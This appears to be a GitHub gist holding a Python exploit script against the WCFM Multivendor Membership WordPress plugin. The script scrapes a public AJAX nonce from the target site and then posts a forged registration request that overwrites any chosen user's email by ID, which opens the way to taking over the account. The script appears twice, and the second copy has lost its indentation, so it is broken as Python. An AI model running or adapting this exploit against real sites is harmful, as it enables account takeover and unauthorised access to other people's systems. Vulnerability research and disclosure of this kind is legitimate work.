lana-codes/wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py Secret

## wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py
#!/usr/bin/python3

import sys
import getopt
import re
import requests
import json
from urllib.parse import urlencode
from bs4 import BeautifulSoup


def main(argv):
    website_url = ''
    email = ''
    user_id = ''

    try:
        opts, args = getopt.getopt(argv, 'hw:e:u:', ['website_url=', 'email=', 'user_id='])
    except getopt.GetoptError:
        print(
            'wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py -w <website_url> -e <email> -u <user_id>'
        )
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print(
                'wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py -w <website_url> -e <email> -u <user_id>'
            )
            sys.exit()
        elif opt in ('-w', '--website_url'):
            website_url = arg
        elif opt in ('-e', '--email'):
            email = arg
        elif opt in ('-u', '--user_id'):
            user_id = arg

    # format url
    website_url = website_url.rstrip('\/')

    # check website url
    if website_url == '':
        print('Please provide the WordPress website URL!')
        sys.exit(2)

    # check user id
    if user_id == '':
        print('Please provide the user id!')
        sys.exit(2)

    # get nonce value from js
    response = requests.get(website_url)
    soup = BeautifulSoup(response.text, 'html.parser')

    wcfm_core_js_element = soup.find('script', {'id': 'wcfm_core_js-js-extra'})
    wcfm_core_js = wcfm_core_js_element.string

    wcfm_params_match = re.search(r'var wcfm_params = ({.*?});', wcfm_core_js)

    if wcfm_params_match:
        json_string = wcfm_params_match.group(1)
        data = json.loads(json_string)
        wcfm_ajax_nonce = data['wcfm_ajax_nonce']
    else:
        print('Nonce is not found on the website.')
        sys.exit(2)

    # update user email request
    response = requests.post(website_url + '/wp-admin/admin-ajax.php',
                             headers={'Content-Type': 'application/x-www-form-urlencoded'},
                             data={
                                 'action': 'wcfm_ajax_controller',
                                 'wcfm_ajax_nonce': wcfm_ajax_nonce,
                                 'controller': 'wcfm-memberships-registration',
                                 'wcfm_membership_registration_form': urlencode({
                                     'user_email': email,
                                     'member_id': user_id,
                                     'user_name': '-',
                                 })
                             })

    response_json = json.loads(response.text)

    if response_json['status']:
        print('Successfully exploited! User\'s email updated!')
    else:
        # get error message
        print('Error: ' + response_json['message'])


if __name__ == '__main__':
    main(sys.argv[1:])
	#!/usr/bin/python3

	import sys
	import getopt
	import re
	import requests
	import json
	from urllib.parse import urlencode
	from bs4 import BeautifulSoup


	def main(argv):
	website_url = ''
	email = ''
	user_id = ''

	try:
	opts, args = getopt.getopt(argv, 'hw:e:u:', ['website_url=', 'email=', 'user_id='])
	except getopt.GetoptError:
	print(
	'wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py -w <website_url> -e <email> -u <user_id>'
	)
	sys.exit(2)
	for opt, arg in opts:
	if opt == '-h':
	print(
	'wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py -w <website_url> -e <email> -u <user_id>'
	)
	sys.exit()
	elif opt in ('-w', '--website_url'):
	website_url = arg
	elif opt in ('-e', '--email'):
	email = arg
	elif opt in ('-u', '--user_id'):
	user_id = arg

	# format url
	website_url = website_url.rstrip('\/')

	# check website url
	if website_url == '':
	print('Please provide the WordPress website URL!')
	sys.exit(2)

	# check user id
	if user_id == '':
	print('Please provide the user id!')
	sys.exit(2)

	# get nonce value from js
	response = requests.get(website_url)
	soup = BeautifulSoup(response.text, 'html.parser')

	wcfm_core_js_element = soup.find('script', {'id': 'wcfm_core_js-js-extra'})
	wcfm_core_js = wcfm_core_js_element.string

	wcfm_params_match = re.search(r'var wcfm_params = ({.*?});', wcfm_core_js)

	if wcfm_params_match:
	json_string = wcfm_params_match.group(1)
	data = json.loads(json_string)
	wcfm_ajax_nonce = data['wcfm_ajax_nonce']
	else:
	print('Nonce is not found on the website.')
	sys.exit(2)

	# update user email request
	response = requests.post(website_url + '/wp-admin/admin-ajax.php',
	headers={'Content-Type': 'application/x-www-form-urlencoded'},
	data={
	'action': 'wcfm_ajax_controller',
	'wcfm_ajax_nonce': wcfm_ajax_nonce,
	'controller': 'wcfm-memberships-registration',
	'wcfm_membership_registration_form': urlencode({
	'user_email': email,
	'member_id': user_id,
	'user_name': '-',
	})
	})

	response_json = json.loads(response.text)

	if response_json['status']:
	print('Successfully exploited! User\'s email updated!')
	else:
	# get error message
	print('Error: ' + response_json['message'])


	if __name__ == '__main__':
	main(sys.argv[1:])